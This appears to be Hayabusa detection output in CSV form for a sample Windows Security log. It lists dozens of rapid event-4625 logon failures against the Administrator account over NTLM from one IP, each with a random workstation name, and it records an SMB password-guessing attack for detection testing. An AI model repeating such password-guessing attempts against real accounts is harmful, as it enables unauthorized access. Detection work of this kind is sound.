2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
